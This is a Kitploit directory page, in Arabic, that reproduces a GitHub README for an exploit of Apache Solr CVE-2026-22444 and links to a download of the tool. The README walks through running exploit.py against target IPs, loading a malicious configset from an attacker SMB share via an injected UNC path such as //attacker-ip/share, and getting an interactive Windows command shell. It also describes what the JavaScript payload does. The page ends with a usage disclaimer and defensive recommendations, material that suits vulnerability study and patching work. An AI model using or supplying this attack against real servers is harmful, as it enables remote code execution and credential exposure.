Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22444 — استغلال لثغرة Apache Solr CVE-2026-22444، يستفيد من حقن مسار UNC وخادم SMB لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر مجموعة إعدادات خبيثة وحمولة JavaScript. | Kitploit
أدوات/GitHubGitHub/bfdfhdsfdd-crypto/cve-2026-22444
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubbfdfhdsfdd-crypto/cve-2026-22444

CVE-2026-22444

استغلال لثغرة Apache Solr CVE-2026-22444، يستفيد من حقن مسار UNC وخادم SMB لتحقيق تنفيذ التعليمات البرمجية عن بُعد عبر مجموعة إعدادات خبيثة وحمولة JavaScript.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22444

ثغرة التحقق من صحة مسار UNC في Apache Solr

نظرة عامة

CVE-2026-22444 هي ثغرة أمنية تؤثر على Apache Solr، تم الكشف عنها علنًا حوالي 20 يناير 2026. تنبع الثغرة من عدم كفاية التحقق من صحة المدخلات (CWE-20: Improper Input Validation) في بعض معاملات واجهة برمجة التطبيقات "create core" في Apache Solr، مما يسمح للمهاجم بتجاوز القواعد الأمنية عندما يعمل Solr في وضع "standalone"، وقد يؤدي ذلك إلى تسرب البيانات، أو تنفيذ التعليمات البرمجية عن بُعد (RCE)، أو كشف تجزئات NTLM.

على وجه التحديد، إذا لم يكن Solr مفعّلًا للمصادقة أو كان المستخدم يمتلك صلاحيات إنشاء النوى (cores)، يمكن للمهاجم إساءة استخدام هذه الواجهة عبر طلبات مصممة بعناية للوصول إلى ملفات محمية أو تنفيذ عمليات ضارة.

معلومات الإفصاح

تم اكتشاف الثغرة في عام 2025 والإبلاغ عنها إلى Apache، وتم الكشف عنها علنًا على القائمة البريدية oss-security:

الإعلان الرسمي: https://www.openwall.com/lists/oss-security/2026/01/20/5

التفاصيل الفنية

توجد الثغرة في CoreContainer.java، حيث يقوم مُنشئ CoreDescriptor بتشغيل عمليات الشبكة قبل تنفيذ التحقق من مسار UNC:

  • instancePath.toAbsolutePath() قد يحل مسارات UNC عبر الشبكة
  • فحص Files.exists() ينفذ استدعاءات شبكة
  • Files.newInputStream() ينفذ قراءة من الشبكة
  • التحقق من المسار عبر assertPathAllowed() يحدث فقط بعد هذه العمليات
  • الجدول الزمني

    • 2025-08-20: اكتشاف الثغرة والإبلاغ عنها إلى Apache
    • 2026-01-20: الإفصاح العلني

    محتويات المستودع

    • exploit.py - سكربت استغلال لإثبات المفهوم
    • files/ - ملفات الدعم المطلوبة للاستغلال (configset)
      • rce.js - حمولة JavaScript لتنفيذ التعليمات البرمجية عن بُعد
      • conf/ - ملفات تكوين Solr
        • solrconfig.xml - تعريف سلسلة معالجات التحديث الضارة
        • schema.xml - تعريف مخطط Solr
        • managed-schema - ملف المخطط المُدار
    • requirements.txt - تبعيات Python

    تعليمات الاستخدام

    المتطلبات البيئية

    • Python 3.6+
    • يجب أن يعمل النظام المستهدف على Apache Solr (أنظمة Windows، الوضع المستقل)
    • يجب ألا يكون Solr الهدف مفعّلًا للمصادقة، أو يجب أن يمتلك المهاجم صلاحيات إنشاء النوى

    تثبيت التبعيات

    root@kitploit:~
    pip install -r requirements.txt
    

    تشمل التبعيات:

    • requests>=2.25.0 - لطلبات HTTP
    • impacket>=0.10.0 - لإنشاء خادم SMB

    الاستخدام الأساسي

    1. الهجوم الأساسي (الكشف التلقائي عن IP المحلي)

    root@kitploit:~
    python3 exploit.py <IP الهدف>
    

    مثال:

    root@kitploit:~
    python3 exploit.py 192.168.1.100
    

    2. تحديد منفذ Solr

    root@kitploit:~
    python3 exploit.py <IP الهدف> --port <المنفذ>
    

    مثال:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --port 8983
    

    3. تحديد تكوين خادم SMB

    root@kitploit:~
    python3 exploit.py <IP الهدف> --smb-host <IP خادم SMB> --smb-port <منفذ SMB>
    

    مثال:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --smb-host 192.168.1.50 --smb-port 445
    

    4. تخصيص اسم مشاركة SMB

    root@kitploit:~
    python3 exploit.py <IP الهدف> --share-name <اسم المشاركة>
    

    مثال:

    root@kitploit:~
    python3 exploit.py 192.168.1.100 --share-name myshare
    

    شرح معاملات سطر الأوامر

    root@kitploit:~
    المواضع:
      target_host           عنوان IP لخادم Solr الهدف
    
    المعاملات الاختيارية:
      -h, --help            عرض رسالة المساعدة والخروج
      --port, -p PORT       منفذ خادم Solr (الافتراضي: 8983)
      --smb-host SMB_HOST   IP خادم SMB (الافتراضي: الكشف التلقائي عن IP المحلي)
      --smb-port SMB_PORT   منفذ خادم SMB (الافتراضي: 445)
      --share-name SHARE    اسم مشاركة SMB (الافتراضي: malicious)
    

    سير الهجوم

    1. تشغيل خادم SMB: يقوم السكربت بتشغيل خادم SMB محليًا، ويشارك دليل files
    2. إنشاء Core ضار: إرسال طلب إنشاء core إلى Solr الهدف، مع الإشارة إلى configset الضار على خادم SMB
    3. تشغيل الحمولة: يقوم Solr بتنزيل ملفات التكوين من خادم SMB، والتي تحتوي على كود JavaScript ضار
    4. تنفيذ الأوامر: تشغيل حمولة JavaScript عبر إرسال طلب تحديث
    5. Shell تفاعلي: بعد الاستغلال الناجح، يتم الدخول إلى بيئة تنفيذ أوامر تفاعلية

    استخدام الـ Shell التفاعلي

    بعد الاستغلال الناجح، يوفر السكربت shell تفاعلي:

    root@kitploit:~
    solr> whoami
    [+] exit_code: 0, status: success
    --- stdout ---
    desktop-abc123\user
    
    solr> dir
    [+] exit_code: 0, status: success
    --- stdout ---
    Volume in drive C has no label.
    ...
    
    solr> exit
    [*] exiting shell...
    

    الأوامر المدعومة:

    • أي أمر Windows CMD
    • exit أو quit - الخروج من الـ shell التفاعلي
    • Ctrl+C - المقاطعة والخروج

    آلية العمل

    تستغل الثغرة سلسلة التقنيات التالية:

    1. حقن مسار UNC: حقن مسار UNC عبر معامل configSet (مثل //attacker-ip/share)
    2. خادم SMB: استضافة ملفات تكوين Solr الضارة
    3. RCE عبر JavaScript: استغلال StatelessScriptUpdateProcessorFactory في Solr لتنفيذ كود JavaScript
    4. تنفيذ الأوامر: تنفيذ أوامر عشوائية على النظام المستهدف عبر Java Runtime API

    أمثلة الاستخدام المتقدم

    مثال بالمعاملات الكاملة

    root@kitploit:~
    python3 exploit.py 192.168.35.31 \
      --port 8983 \
      --smb-host 192.168.35.50 \
      --smb-port 445 \
      --share-name exploit
    

    شرح بنية الملفات

    root@kitploit:~
    CVE-2026-22444/
    ├── exploit.py              # السكربت الرئيسي للاستغلال
    ├── requirements.txt        # تبعيات Python
    ├── files/                  # configset الضار
    │   ├── rce.js             # حمولة RCE بلغة JavaScript
    │   └── conf/              # دليل تكوين Solr
    │       ├── solrconfig.xml # تكوين معالج التحديث الضار
    │       ├── schema.xml     # تعريف المخطط
    │       └── managed-schema # المخطط المُدار
    └── README.md              # هذا الملف
    

    شرح الحمولة

    rce.js: هذه هي حمولة RCE الأساسية، وتقوم بما يلي:

    • اعتراض عمليات التحديث في Solr (add، delete، commit، rollback)
    • الحصول على معامل cmd من معاملات الطلب
    • تنفيذ الأوامر عبر Java Runtime API
    • التقاط stdout و stderr
    • إرجاع نتائج التنفيذ ورموز الخروج

    solrconfig.xml: يهيئ Solr لاستخدام سلسلة معالجات التحديث الضارة:

    • تعريف سلسلة معالجات التحديث rce-chain
    • الإشارة إلى سكربت rce.js
    • تعيين معالج طلبات /update لاستخدام هذه السلسلة

    ملاحظات هامة

    ⚠️ تحذير: هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأغراض التعليمية. الاستخدام غير المصرح به لهذه الأداة لمهاجمة الأنظمة غير قانوني.

    • تأكد من الحصول على إذن كتابي صريح قبل الاستخدام
    • استخدمها فقط في بيئات الاختبار أو البيئات المصرح بها قانونيًا
    • لا تستخدمها على الأنظمة الإنتاجية إلا في بيئات اختبار الاختراق الخاضعة للرقابة
    • المستخدم مسؤول عن أفعاله

    توصيات الحماية

    1. ترقية Solr: ترقية Apache Solr إلى إصدار تم فيه إصلاح هذه الثغرة
    2. تفعيل المصادقة: التأكد من تفعيل آليات مصادقة قوية في Solr
    3. تقييد صلاحيات إنشاء النوى: منح صلاحيات إنشاء النوى للمستخدمين الموثوقين فقط
    4. عزل الشبكة: نشر Solr في بيئة شبكة محمية
    5. قواعد جدار الحماية: تقييد الوصول إلى واجهة إدارة Solr
    6. مراقبة الأنشطة الشاذة: مراقبة الوصول إلى مسارات UNC وطلبات إنشاء النوى غير المعتادة

    الروابط المرجعية

    • الموقع الرسمي لـ Apache Solr
    • إعلان القائمة البريدية OSS Security
    • CWE-20: Improper Input Validation

    الترخيص

    يتبع هذا المشروع رخصة MIT. يرجى الرجوع إلى ملف LICENSE للحصول على التفاصيل.

    إخلاء المسؤولية

    هذه الأداة والمعلومات مخصصة لأغراض البحث الأمني والتعليم فقط. المؤلف غير مسؤول عن أي أضرار ناتجة عن إساءة استخدام هذه المعلومات أو الأداة. يجب على المستخدم الامتثال لجميع القوانين واللوائح المعمول بها، والحصول على التصريح المناسب قبل الاستخدام.

    تنزيل الأداة